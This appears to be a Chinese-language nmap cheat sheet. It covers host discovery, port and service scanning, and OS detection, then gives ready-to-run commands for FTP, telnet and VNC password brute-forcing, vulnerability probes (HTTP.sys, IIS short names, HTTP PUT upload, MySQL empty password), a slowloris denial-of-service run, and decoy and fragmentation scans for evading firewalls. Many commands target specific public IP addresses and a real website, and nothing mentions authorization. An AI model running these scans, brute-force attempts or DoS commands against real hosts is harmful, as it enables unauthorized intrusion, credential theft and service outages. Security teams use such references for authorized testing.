主机探测
扫描单个主机:
nmap 192.168.1.2
扫描多个主机:
nmap 192.168.1.2 192.168.1.23
扫描整个子网:
nmap 192.168.1.1/24
nmap -sL 192.168.1.1/24
扫描整个子网除去某个IP:
nmap 192.168.1.1/24 -exclude 192.168.1.5
nmap 192.168.1.1/24 -excludefile xxx.txt
扫描一个范围:
nmap 192.168.1.1-99
扫描列表:
namp -iL xxx.txt
端口扫描
常用命令:
nmap -F -sT -v nmap.org
-F:扫描一百个最有可能开放的端口
-sT:采用TCP扫描(默认TCP,可不写)(-sS,SYN扫描)
-v:获取扫描信息
-p:指定扫描端口
使用UDP ping探测主机:
nmap -PU 192.168.1.0/24
服务版本探测:
nmap -sV 192.168.1.1
精准确认端口上运行的服务:
nmap -sV --script unusual-port 192.168.1.1
探测目标主机的操作系统
nmap –O 192.168.1.19
nmap –A 192.168.1.19
-oN:导出扫描结果
-oX:导出扫描结果xml格式
密码破解
ftp弱口令暴力破解:
nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153
暴力破解telnet:
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst --script-args telnet-brute.timeout=8s 203.195.139.153
收集VNC信息:
nmap --script vnc-info 203.195.139.153
暴力破解VNC:
nmap --script vnc-brute --script-args brute.guesses=6,brute.emptypass=true,userdb=/root/dictionary/user.txt,brute.useraspass=true,passdb=/root/dictionary/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128
漏洞探测
验证HTTP.sys 远程代码执行:
nmap -sV --script http-vuln-cve2015-1635 203.195.139.153
IIS 短文件泄露:
nmap -p 8080 --script http-iis-short-name-brute 61.142.64.176
http 拒绝服务:
nmap --max-parallelism 800--script http-slowloris scanme.nmap.org
证http 中开启了put 方法:
nmap --script http-put --script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16
验证mysql 匿名访问:
nmap --script mysql-empty-password 203.195.139.153
使用nmap 验证多种漏洞
防火墙躲避绕过
-f:分片绕过
-D:使用诱饵隐蔽扫描
namp -D 1.1.1.1,222.222.222.222 www.baidu.com
--source-port 原端口欺骗
叨叨几句... NOTHING